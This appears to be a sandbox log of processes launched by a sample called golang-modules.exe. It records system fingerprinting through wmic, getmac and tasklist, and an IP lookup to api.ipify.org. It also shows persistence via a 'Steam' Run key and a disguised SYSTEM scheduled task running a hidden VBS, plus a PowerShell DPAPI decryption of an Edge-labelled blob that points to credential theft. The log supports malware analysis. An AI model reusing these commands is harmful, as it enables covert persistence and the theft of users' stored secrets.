Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_computersystemproduct get uuidJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\user\Desktop\golang-modules.exe" /fJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductNameJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversionJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\reg.exe reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversionJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:listJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cscript.exe C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbsJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
